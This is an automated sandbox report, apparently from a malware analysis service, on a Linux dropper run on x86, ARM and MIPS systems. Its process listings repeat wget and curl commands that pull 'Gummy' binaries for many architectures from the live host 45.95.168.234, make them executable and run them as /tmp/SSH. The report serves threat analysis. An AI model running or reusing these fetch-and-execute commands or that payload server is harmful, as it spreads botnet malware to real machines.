Analysis Overview
SHA256
714d4cbbefe02a253c95ec26c8aa552bb48de01a9604086a61a1db89a3722bd6
Threat Level: Shows suspicious behavior
The file bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-23 23:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-23 23:19
Reported
2024-08-23 23:22
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
60s
Max time network
132s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/SSH | /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 | N/A |
Processes
/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118
[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.x86]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.x86]
/bin/cat
[cat Gummy.x86]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mips]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mips]
/bin/cat
[cat Gummy.mips]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mpsl]
/bin/cat
[cat Gummy.mpsl]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm4]
/bin/cat
[cat Gummy.arm4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm5]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm5]
/bin/cat
[cat Gummy.arm5]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm6]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm6]
/bin/cat
[cat Gummy.arm6]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm7]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm7]
/bin/cat
[cat Gummy.arm7]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.ppc]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.ppc]
/bin/cat
[cat Gummy.ppc]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.m68k]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.m68k]
/bin/cat
[cat Gummy.m68k]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.sh4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.sh4]
/bin/cat
[cat Gummy.sh4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.15:443 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-23 23:19
Reported
2024-08-23 23:22
Platform
debian9-armhf-20240611-en
Max time kernel
63s
Max time network
67s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/SSH | /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 | N/A |
Processes
/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118
[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.x86]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.x86]
/bin/cat
[cat Gummy.x86]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mips]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mips]
/bin/cat
[cat Gummy.mips]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mpsl]
/bin/cat
[cat Gummy.mpsl]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm4]
/bin/cat
[cat Gummy.arm4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm5]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm5]
/bin/cat
[cat Gummy.arm5]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm6]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm6]
/bin/cat
[cat Gummy.arm6]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm7]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm7]
/bin/cat
[cat Gummy.arm7]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.ppc]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.ppc]
/bin/cat
[cat Gummy.ppc]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.m68k]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.m68k]
/bin/cat
[cat Gummy.m68k]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.sh4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.sh4]
/bin/cat
[cat Gummy.sh4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp |
Files
memory/776-1-0xb673d000-0xb674e044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-23 23:19
Reported
2024-08-23 23:22
Platform
debian9-mipsbe-20240611-en
Max time kernel
78s
Max time network
83s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/SSH | /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 | N/A |
Processes
/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118
[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.x86]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.x86]
/bin/cat
[cat Gummy.x86]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-skqFsz]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mips]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mips]
/bin/cat
[cat Gummy.mips]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-skqFsz]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mpsl]
/bin/cat
[cat Gummy.mpsl]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm4]
/bin/cat
[cat Gummy.arm4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm5]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm5]
/bin/cat
[cat Gummy.arm5]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm6]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm6]
/bin/cat
[cat Gummy.arm6]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm7]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm7]
/bin/cat
[cat Gummy.arm7]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.ppc]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.ppc]
/bin/cat
[cat Gummy.ppc]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.m68k]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.m68k]
/bin/cat
[cat Gummy.m68k]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.sh4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.sh4]
/bin/cat
[cat Gummy.sh4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-23 23:19
Reported
2024-08-23 23:22
Platform
debian9-mipsel-20240611-en
Max time kernel
62s
Max time network
65s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/SSH | /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 | N/A |
Processes
/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118
[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.x86]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.x86]
/bin/cat
[cat Gummy.x86]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mips]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mips]
/bin/cat
[cat Gummy.mips]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mpsl]
/bin/cat
[cat Gummy.mpsl]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm4]
/bin/cat
[cat Gummy.arm4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm5]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm5]
/bin/cat
[cat Gummy.arm5]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm6]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm6]
/bin/cat
[cat Gummy.arm6]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm7]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm7]
/bin/cat
[cat Gummy.arm7]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
